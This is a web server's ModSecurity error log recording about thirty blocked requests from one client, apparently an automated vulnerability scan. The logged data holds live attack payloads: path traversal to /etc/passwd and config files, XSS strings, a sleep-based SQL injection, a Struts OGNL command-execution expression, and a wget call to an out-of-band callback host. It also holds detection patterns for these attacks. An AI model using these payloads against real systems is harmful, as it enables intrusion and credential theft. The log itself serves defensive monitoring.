[Tue Aug 29 11:48:55.416923 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAk7QLcAAAAi"]
[Tue Aug 29 11:48:56.369490 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAlkwiYAAAAO"]
[Tue Aug 29 11:48:57.431458 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAkle1cAAAAD"]
[Tue Aug 29 11:48:57.441965 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAkksP4AAAAA"]
[Tue Aug 29 11:48:57.449288 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAlV8CsAAAA1"]
[Tue Aug 29 11:48:58.385811 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAkGCZoAAAAE"]
[Tue Aug 29 11:48:59.429304 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAltVZ0AAAAR"]
[Tue Aug 29 11:49:02.379382 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gqkt6e4qnbais9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAhujDgAAAAr"]
[Tue Aug 29 11:49:04.464986 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAkle10AAAAD"]
[Tue Aug 29 11:49:05.446188 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlPmvkAAAAv"]
[Tue Aug 29 11:49:08.461712 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAjYrGcAAAAK"]
[Tue Aug 29 11:49:09.390686 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAkyyAcAAAAW"]
[Tue Aug 29 11:49:10.388338 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAmHd6QAAAAz"]
[Tue Aug 29 11:49:15.382005 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAkr0BcAAAAC"]
[Tue Aug 29 11:51:05.337449 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAl4sWYAAAAf"]
[Tue Aug 29 11:51:05.394359 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAhoHOAAAAAl"]
[Tue Aug 29 11:51:05.631682 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBecAAAAn"]
[Tue Aug 29 11:51:05.907329 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBfMAAAAn"]
[Tue Aug 29 11:51:06.060022 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OsCo-f0AAAlIBfkAAAAn"]
[Tue Aug 29 11:51:06.174871 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAhoHOwAAAAl"]
[Tue Aug 29 11:51:08.636487 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAnCKxEAAAAK"]
[Tue Aug 29 11:51:08.637397 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAmHd8wAAAAz"]
[Tue Aug 29 11:51:09.568354 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAm5Bv4AAAAA"]
[Tue Aug 29 11:51:09.579097 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAmHd9AAAAAz"]
[Tue Aug 29 11:51:10.948164 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAm91lwAAAAG"]
[Tue Aug 29 11:51:11.568916 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAm@5v0AAAAH"]
[Tue Aug 29 11:51:12.774023 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAfWODMAAAAL"]
[Tue Aug 29 11:51:13.549519 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAmNp2YAAAAQ"]
[Tue Aug 29 11:51:13.585446 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAknEN0AAAAB"]
[Tue Aug 29 11:51:13.667188 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAm-McQAAAAI"]
